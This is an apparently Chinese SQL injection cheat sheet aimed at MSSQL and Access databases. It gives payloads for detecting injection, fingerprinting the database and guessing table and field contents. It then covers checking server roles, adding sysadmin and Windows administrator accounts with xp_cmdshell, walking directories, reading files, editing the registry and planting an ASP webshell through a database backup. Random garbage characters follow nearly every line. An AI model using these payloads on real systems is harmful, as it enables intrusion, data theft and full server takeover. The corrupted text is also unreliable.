1.判断是否有注入;and 1=1 ;and 1=2 �Wg�NA%.|,
2.初步判断是否是mssql ;and user>0 RX���gb/VR
8��lyIL^�
3.注入参数是字符'and [查询条件] and ''=' 'xW=qboOp
#C�S>_qe.{
4.搜索时没过滤参数的'and [查询条件] and '%25'=' 77�RZ<u9/`
wh:��;G`6S
5.判断数据库系统 .LzA'�q1+z
�v�q$6e*A�
;and (select count(*) from sysobjects)>0 mssql `PWKA;W�$0
J)|3jbX"I]
;and (select count(*) from msysobjects)>0 access Y�>x{ [er
@*;x1A�-]V
CK_�d�Eh2c
j7I=2xnTWu
6.猜数据库 ;and (select Count(*) from [数据库名])>0 q;{(���o2g
)_#V�>cvNG
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �4_#�$k�{
v?�8WQ�Ny
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ���Ob�0sB@
{�oQs*`=l>
9.(1)猜字段的ascii值(access) 8}�QM�~&&.
�v�\x��l?F
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 $��>rt0LOF
� 3.&BhL�T
(2)猜字段的ascii值(mssql) Iiy5;:CX:q
�Jqoo&T")�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Yh<F-WOo�2
o}N@Q-i gq
10.测试权限结构(mssql) �LU3�p�CM{
%YG?7P�BB�
�Lj�ZlKB5C
{yn,u)@r9S
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ,� Z�sZzZ#
yF)o_OA[uR
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- +gl�\l?>sr
FXCBX:LnvU
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- &L6�Ivpj-�
ZFZ'&"�+��
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �K+3-X�h�G
�J;4x$�BI�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- UP](�1lA�f
��9�q;O`&�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- !BQt�+4G�7
(�5T>�`7g8
;and 1=(select IS_MEMBER('db_owner'));-- �2?,Jn&i5�
-]3�K#M)s�
(HNc9QVC'W
pqG�>�|#RG
11.添加mssql和系统的帐户 �x@#>l8�k?
)���5|9EXh
;exec master.dbo.sp_addlogin username;-- |rx5O5p�
;exec master.dbo.sp_password null,username,password;-- 3vrV�X<_��
**q8v�hJ�M
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- @?B+|�*�cm
[YvS#M3��T
;exec master.dbo.xp_cmdshell 'net user username password ���M9"B�x/
a�;o0#I#Si
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- E�,i^r�A�m
4$-�R|@,|_
;exec master.dbo.xp_cmdshell 'net user username password /add';-- I;4quFBlMu
N&8$tJ(hhx
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ( 5LCy?�-6
`>"�#d
?,
�V^7.@BeT�
�Ym'h�
v�K
12.(1)遍历目录 .; MS�78BR
1RA�kqw<E
;create table dirs(paths varchar(100), id int) C4m+�Ta��%
r8:r}Qj2w[
;insert dirs exec master.dbo.xp_dirtree 'c:\' P(T-2��Ux6
Ca�-"3aQkc
;and (select top 1 paths from dirs)>0 f2g��tz{�r
f���3UCELJ
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Khj�C'C�U,
@IG�'s���-
OVL�V�sN�g
HLyA�zB~r
(2)遍历目录 [6VB& ���
�Z`�TfS+O6
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 1��/$��PxQ
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 O-,�
"/�Z
* ��+
T(i
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ,_V V��;�P
B��J�
UG<k
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 :z�L�)O���
�9�#DX��A}
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �3�lF��"nv
L;�V���8c
I�%d=c0>%
�+��\=g&G,
13.mssql中的存储过程 1l-5H7^w2?
h&4s%:_�4�
xp_regenumvalues 注册表根键, 子键 LL<x�yg��d
�>a�8iY|QY
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 *fN�+wiP�D
#�� ~<]�z
xp_regread 根键,子键,键值名 :qm��\�FsO
p�%I)�&- 8
;exec xp_regread N[Z`�tk?-�
��l��Y,�^�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �e�o+�<@83
�f��-~�Y��
xp_regwrite 根键,子键, 值名, 值类型, 值 N,��Y)'s<
Zc7;&�cz��
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 w$
8�r<?^3
c�St�)Na~C
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �e!VtD�JDS
R3B�+�vLGX
xp_regdeletevalue 根键,子键,值名 qO{z{@jo55
Zth�T('�"a
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 JBY.e�r`6C
.SC�*!���,
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 7uR;S:�WX�
7I3_$��uF�
CX]1I�|T5�
'5h`��="��
14.mssql的backup创建webshell 9=>q�0D�2�
t�F;0�P\�i
use model =Jm[�1Mgt�
^s)`UZ<C=�
create table cmd(str image); �W9�SU1{*9
Z],j|r�Wy6
insert into cmd(str) values (''); �;2�1D�^�e
xsa�`R^5/c
backup database model to disk='c:\l.asp'; �FW�b�p;v{
Z6I�|�Y5#H
$z�P5H�zx�
�)D�o 0�
15.mssql内置函数 U[wx){�[|�
bq��/Aopfr
;and (select @@version)>0 获得Windows的版本号 9c^�,v_W@
~0MpB~ {xd
;and user_name()='dbo' 判断当前系统的连接用户是不是sa um,f!h�o-U
j_JY[se��x
;and (select user_name())>0 爆当前系统的连接用户 Tpl]\L1v�-
ggD���T5hb
;and (select db_name())>0 得到当前连接的数据库 bR�vG�et�X
�+byO�ThuE
&�ijz'Sg�3
o�/��N!l]r
16.简洁的webshell �h'*v�$l�t
gPd
�K%"B@
use model �Mj@�2=c�
7
$y;-[�E[
create table cmd(str image); &g|[/~dI�r
�-[=~!Qr�:
insert into cmd(str) values (''); �V'v�Wz�`#
�`'1g>Ebk0
backup database model to disk='g:\wwwtest\l.asp';
